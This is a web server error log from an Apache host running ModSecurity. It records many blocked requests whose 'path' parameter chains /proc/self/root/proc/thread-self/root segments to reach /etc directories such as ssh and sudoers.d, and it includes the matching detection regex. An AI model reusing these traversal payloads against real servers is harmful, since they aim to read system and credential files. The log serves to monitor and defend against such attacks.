[Thu Mar 19 13:34:09.303792 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:45354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlgAbLMZ6AikZjR9Vx6wAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:10.685441 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:47588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlggkwaGbbGflqUZDc8wAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:12.910997 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:47592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlhMdf6f5d65gmYZSNzQAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:13.111327 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:47592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlhcdf6f5d65gmYZSNzgAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:14.121798 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36530] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:34:14.904215 2026] [mime_magic:error] [pid 27403:tid 140411540502272] (70014)End of file found: [client 74.7.241.31:58294] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/lib/yum/yumdb
[Thu Mar 19 13:34:14.904337 2026] [access_compat:error] [pid 27403:tid 140411540502272] [client 74.7.241.31:58294] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/lib/yum/yumdb
[Thu Mar 19 13:34:15.943794 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:47604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlh_-YZRR_7pZ7nDKgFAAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:17.667198 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:47616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlicdf6f5d65gmYZSNzwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:19.029684 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:47626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwli-yqAr6etmhZHNp0YQAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:20.939057 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:55168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwljAkwaGbbGflqUZDc-AAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:23.340170 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.243.128:55182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwljgbLMZ6AikZjR9Vx8gAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:24.790270 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:55188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlkOoXxyEfFpUF8f8hgAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:32.664378 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:53826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlmAbLMZ6AikZjR9Vx-QAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:36.149817 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37254] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:34:37.579455 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:53830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlncdf6f5d65gmYZSN3wAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:37.779698 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:53830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlncdf6f5d65gmYZSN4AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:55.155117 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:49568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlrgkwaGbbGflqUZDdEAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:34:58.221742 2026] [access_compat:error] [pid 31803:tid 140411599251200] [client 216.73.216.191:58032] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 13:34:59.839043 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:35340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwls_u8EFLIOrSqIpu9GQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:35:02.190530 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37908] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:35:03.088499 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:46498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlt9a6ubjKNq_cu4ZrlwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:35:14.554463 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.243.128:46500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlwRkFeYa1D6dYQnAGDwAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:35:17.891371 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:56126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlxV_V7PWP6ixUYl7RowAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:35:35.126709 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38768] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:36:07.345877 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39632] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:36:15.517820 2026] [mime_magic:error] [pid 14269:tid 140411565680384] (70014)End of file found: [client 57.141.18.53:44598] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:36:39.133782 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:37:09.089444 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41482] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:37:29.899342 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:50056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwmSeyqAr6etmhZHNp0zAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:37:33.138843 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42296] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:37:35.172640 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.244.43:33348] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwmT8df6f5d65gmYZSOYgAAAss"]
[Thu Mar 19 13:37:35.182707 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:36110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] 